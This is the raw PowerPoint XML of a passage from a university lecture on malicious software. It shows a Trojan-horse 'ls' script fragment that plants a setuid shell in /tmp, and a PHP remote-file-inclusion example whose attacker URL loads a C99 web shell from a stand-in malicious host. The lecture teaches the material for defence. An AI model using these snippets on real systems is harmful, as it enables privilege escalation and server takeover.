                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> u+s,o+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> /tmp/.xyzzy r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>./ls</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="122174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2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>$*</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="900"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440" marR="349250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1107440" algn="l"/>
                          <a:tab pos="6956425" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="-305" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Y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ou now have a setuid-to-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>them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shell.	If this is the root use</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-120" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r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, you have root access!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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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3017520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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Another</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Example</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-17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PHP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-114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program contains the following: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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>include($pag</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>'.php');</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="850"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="35"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="85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It is used this way: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878840">
                        <a:lnSpc>
                          <a:spcPts val="2700"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.vulnerable.website.com/</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404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30"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>index.php?page=archive</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="850"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="35"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="85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An attacker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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sends this: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1500"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="1500"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1669415">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.vulnerable.website.com/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> index.php?page=http://www.malicious. code.com/C99.php?</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="020703090202050204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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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3600" b="1" spc="-160" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>r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ojan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>H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o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="0" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>se</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1006475" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3240"/>
                        </a:lnSpc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Program with an</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>overt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="1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purpose (known to user) and a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>covert</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="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purpose (unknown to user)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10"/>
                        </a:spcBef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Example:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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previous script is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5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000" spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>rojan horse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 panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Overt purpose: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list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files</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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in directory</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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335"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Covert</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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purpose:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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c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reate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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setuid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shell</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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50"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Mnemonic:</a:t>
                      </a:r>
                      <a:endParaRPr sz="30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 panose="020B0604020202020204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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>O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vert and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>O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pen</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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335"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>C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overt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>nd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-15" dirty="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800" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>oncealed</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204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333CC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E0E120B-1992-4DB2-A610-1C1EC3B700CE}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2D5A1863-39C8-4866-96A7-DF4B8FA9A2FE}"/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2716</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>506</Paragraphs>
  <Slides>49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6" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New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Microsoft PowerPoint - 4823_11_malicious_software.pptx</dc:title>
  <dc:creator>bbrown</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-19T22:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-19T17:53:53Z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2016-09-01T20:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="LastSaved">
    <vt:filetime>2019-06-19T20:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-11.2.0.10132</vt:lpwstr>
  </property>
</Properties>
</file>